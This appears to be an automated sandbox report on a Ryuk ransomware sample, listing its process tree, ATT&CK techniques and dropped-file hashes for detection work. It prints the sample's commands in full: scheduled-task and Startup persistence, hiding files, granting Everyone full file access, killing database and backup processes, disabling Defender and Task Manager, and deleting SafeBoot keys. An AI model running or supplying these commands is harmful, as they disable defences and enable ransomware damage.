PID 3424 wrote to memory of 224	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 224 wrote to memory of 3936	224	cmd.exe	attrib.exe
PID 224 wrote to memory of 3936	224	cmd.exe	attrib.exe
PID 3424 wrote to memory of 2136	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 2136	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 1732	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 1732	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 2136 wrote to memory of 1656	2136	cmd.exe	cmd.exe
PID 2136 wrote to memory of 1656	2136	cmd.exe	cmd.exe
PID 3424 wrote to memory of 4996	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 4996	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 1732 wrote to memory of 4368	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 4368	1732	cmd.exe	reg.exe
PID 4996 wrote to memory of 440	4996	cmd.exe	cmd.exe
PID 4996 wrote to memory of 440	4996	cmd.exe	cmd.exe
PID 4996 wrote to memory of 4288	4996	cmd.exe	taskkill.exe
PID 4996 wrote to memory of 4288	4996	cmd.exe	taskkill.exe
PID 1656 wrote to memory of 2324	1656	cmd.exe	icacls.exe
PID 1656 wrote to memory of 2324	1656	cmd.exe	icacls.exe
PID 3424 wrote to memory of 532	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 532	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 440 wrote to memory of 544	440	cmd.exe	taskkill.exe
PID 440 wrote to memory of 544	440	cmd.exe	taskkill.exe
PID 3424 wrote to memory of 4928	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 4928	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 2680	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 2680	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 4372	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 4372	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 2504	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 2504	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 4276	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 4276	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4276 wrote to memory of 5096	4276	cmd.exe	reg.exe
PID 4276 wrote to memory of 5096	4276	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exe

pid process

2976 attrib.exe
1152 attrib.exe
3936 attrib.exe

pid	process
2976	attrib.exe
1152	attrib.exe
3936	attrib.exe

C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
"C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:4696

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:1604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Drops startup file
PID:4120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
PID:3184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1012

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
3⤵
- Creates scheduled task(s)
PID:1236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1836

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:2976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1796

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:4412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:4252

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /F
3⤵
- Creates scheduled task(s)
PID:1444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:536

C:\Windows\system32\attrib.exe
attrib +h +s ryuk.exe
3⤵
- Views/modifies file attributes
PID:1152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:224

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\ryuk.exe
3⤵
- Views/modifies file attributes
PID:3936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1732

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:4368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:2136

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
- Suspicious use of WriteProcessMemory
PID:1656

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:2324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
2⤵
- Suspicious use of WriteProcessMemory
PID:4996

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
- Suspicious use of WriteProcessMemory
PID:440

C:\Windows\system32\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:544

C:\Windows\system32\taskkill.exe
taskkill /f /t /im veeam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
2⤵
PID:532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
2⤵
PID:4928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
2⤵
PID:2680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
2⤵
PID:4372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
2⤵
PID:2504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4276

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:5096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:1560

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:1552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:3108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:4592

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:3216

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
1⤵
PID:2460

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1820

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RyukReadMe.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:2876

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RYUKID
Filesize
8B

MD5
ca74426334d6b30360770657b1da08ac

SHA1
49209e2a36eb7b5529029fae279a342749bd206d

SHA256
8c83982fb41e8462fe759bd9f7d1a26bad45b62f5f643e7760c26cccee6f90b3

SHA512
f9f088aae7ba2ba3874fbf2caab760caa7396a990ac37d9554b915ca844e0b67a05f2a014ee1e6ba6e1bb8e556e51214d48901f8c7894687c22213f2f4d51f84

Download Submit
C:\ProgramData\RyukReadMe.txt
Filesize
1KB

MD5
fdb92b73b4370f248e57b5292cb4b507

SHA1
5d86a3818e4c38d4821372900f21f8ec62d97efc

SHA256
40f33de8d0fd8293c3d03b3b2a043c7e4e96393510e686b90acebf485bbf0477

SHA512
76b35870a8c7a29a0ce36e548531dc6b09abb51b52781835c87fb7e6c276b84948137aa9f001b717ca0b9ffb0b27f47bae5fbb1be483aa74dbd2542409c387a9

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
c8f9c85dd1d65a2a107290d039060692

SHA1
b9e939eaa82116ea28d87872e1e2c88e78da24c0

SHA256
1921d53e81b690695df9c3b30638b77e7e0d14b52847df548cde7e54d4dedaf0

SHA512
a4cfb0e5730fd51a8f72184ff145a96cbd36e3711cf8d0e03f08abadedaf598b10adae35118b11732d5736ec4bd208f8610519f0b389d9888153af9106f0fe5b

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
c8f9c85dd1d65a2a107290d039060692

SHA1
b9e939eaa82116ea28d87872e1e2c88e78da24c0

SHA256
1921d53e81b690695df9c3b30638b77e7e0d14b52847df548cde7e54d4dedaf0

SHA512
a4cfb0e5730fd51a8f72184ff145a96cbd36e3711cf8d0e03f08abadedaf598b10adae35118b11732d5736ec4bd208f8610519f0b389d9888153af9106f0fe5b

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
04f435c2788f9899523069364b41a97f

SHA1
2ec313396dcec31c36c2e9deba8f4bee7fd4cb99

SHA256
dc3a290a3c4eceb81806715c90c56107171f33a3a34c72f70bbcdb91d3c9e7ea

SHA512
c1cfed3695e7bb2e86b3a5b72ddd4e879a737ae4ada543f2e8feb43661ceb3bc242ec2752fac3008ec434ea70e1b27b09dbcee74bebea8221abea531c0ee7082

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
04f435c2788f9899523069364b41a97f

SHA1
2ec313396dcec31c36c2e9deba8f4bee7fd4cb99

SHA256
dc3a290a3c4eceb81806715c90c56107171f33a3a34c72f70bbcdb91d3c9e7ea

SHA512
c1cfed3695e7bb2e86b3a5b72ddd4e879a737ae4ada543f2e8feb43661ceb3bc242ec2752fac3008ec434ea70e1b27b09dbcee74bebea8221abea531c0ee7082

Download Submit
C:\ProgramData\ryuk.exe
Filesize
885KB

MD5
622bc38dee08e70e91e2be32a58b6d1f

SHA1
7cfec4859fa7ca178095983b3f174f842a44b0c2

SHA256
be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a

SHA512
176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID
Filesize
8B

MD5
ca74426334d6b30360770657b1da08ac

SHA1
49209e2a36eb7b5529029fae279a342749bd206d

SHA256
8c83982fb41e8462fe759bd9f7d1a26bad45b62f5f643e7760c26cccee6f90b3

SHA512
f9f088aae7ba2ba3874fbf2caab760caa7396a990ac37d9554b915ca844e0b67a05f2a014ee1e6ba6e1bb8e556e51214d48901f8c7894687c22213f2f4d51f84

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1
Filesize
2KB

MD5
c8f9c85dd1d65a2a107290d039060692

SHA1
b9e939eaa82116ea28d87872e1e2c88e78da24c0

SHA256
1921d53e81b690695df9c3b30638b77e7e0d14b52847df548cde7e54d4dedaf0

SHA512
a4cfb0e5730fd51a8f72184ff145a96cbd36e3711cf8d0e03f08abadedaf598b10adae35118b11732d5736ec4bd208f8610519f0b389d9888153af9106f0fe5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2
Filesize
292B

MD5
04f435c2788f9899523069364b41a97f

SHA1
2ec313396dcec31c36c2e9deba8f4bee7fd4cb99

SHA256
dc3a290a3c4eceb81806715c90c56107171f33a3a34c72f70bbcdb91d3c9e7ea

SHA512
c1cfed3695e7bb2e86b3a5b72ddd4e879a737ae4ada543f2e8feb43661ceb3bc242ec2752fac3008ec434ea70e1b27b09dbcee74bebea8221abea531c0ee7082

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
Filesize
885KB

MD5
622bc38dee08e70e91e2be32a58b6d1f

SHA1
7cfec4859fa7ca178095983b3f174f842a44b0c2

SHA256
be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a

SHA512
176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d

Download Submit
C:\Users\Admin\Desktop\RyukReadMe.txt
Filesize
1KB

MD5
fdb92b73b4370f248e57b5292cb4b507

SHA1
5d86a3818e4c38d4821372900f21f8ec62d97efc

SHA256
40f33de8d0fd8293c3d03b3b2a043c7e4e96393510e686b90acebf485bbf0477

SHA512
76b35870a8c7a29a0ce36e548531dc6b09abb51b52781835c87fb7e6c276b84948137aa9f001b717ca0b9ffb0b27f47bae5fbb1be483aa74dbd2542409c387a9

Download Submit
memory/224-148-0x0000000000000000-mapping.dmp

Download
memory/440-155-0x0000000000000000-mapping.dmp

Download
memory/532-160-0x0000000000000000-mapping.dmp

Download
memory/536-146-0x0000000000000000-mapping.dmp

Download
memory/544-161-0x0000000000000000-mapping.dmp

Download
memory/1012-137-0x0000000000000000-mapping.dmp

Download
memory/1152-147-0x0000000000000000-mapping.dmp

Download
memory/1236-138-0x0000000000000000-mapping.dmp

Download
memory/1444-145-0x0000000000000000-mapping.dmp

Download
memory/1552-176-0x0000000000000000-mapping.dmp

Download
memory/1560-175-0x0000000000000000-mapping.dmp

Download
memory/1604-133-0x0000000000000000-mapping.dmp

Download
memory/1656-152-0x0000000000000000-mapping.dmp

Download
memory/1732-151-0x0000000000000000-mapping.dmp

Download
memory/1796-142-0x0000000000000000-mapping.dmp

Download
memory/1836-139-0x0000000000000000-mapping.dmp

Download
memory/2136-150-0x0000000000000000-mapping.dmp

Download
memory/2324-157-0x0000000000000000-mapping.dmp

Download
memory/2460-178-0x0000000000000000-mapping.dmp

Download
memory/2504-171-0x0000000000000000-mapping.dmp

Download
memory/2680-165-0x0000000000000000-mapping.dmp

Download
memory/2976-140-0x0000000000000000-mapping.dmp

Download
memory/3108-177-0x0000000000000000-mapping.dmp

Download
memory/3184-136-0x0000000000000000-mapping.dmp

Download
memory/3216-180-0x0000000000000000-mapping.dmp

Download
memory/3936-149-0x0000000000000000-mapping.dmp

Download
memory/4120-134-0x0000000000000000-mapping.dmp

Download
memory/4252-144-0x0000000000000000-mapping.dmp

Download
memory/4276-173-0x0000000000000000-mapping.dmp

Download
memory/4288-156-0x0000000000000000-mapping.dmp

Download
memory/4368-154-0x0000000000000000-mapping.dmp

Download
memory/4372-169-0x0000000000000000-mapping.dmp

Download
memory/4412-143-0x0000000000000000-mapping.dmp

Download
memory/4592-179-0x0000000000000000-mapping.dmp

Download
memory/4696-132-0x0000000000000000-mapping.dmp

Download
memory/4928-163-0x0000000000000000-mapping.dmp

Download
memory/4996-153-0x0000000000000000-mapping.dmp

Download
memory/5096-174-0x0000000000000000-mapping.dmp

Download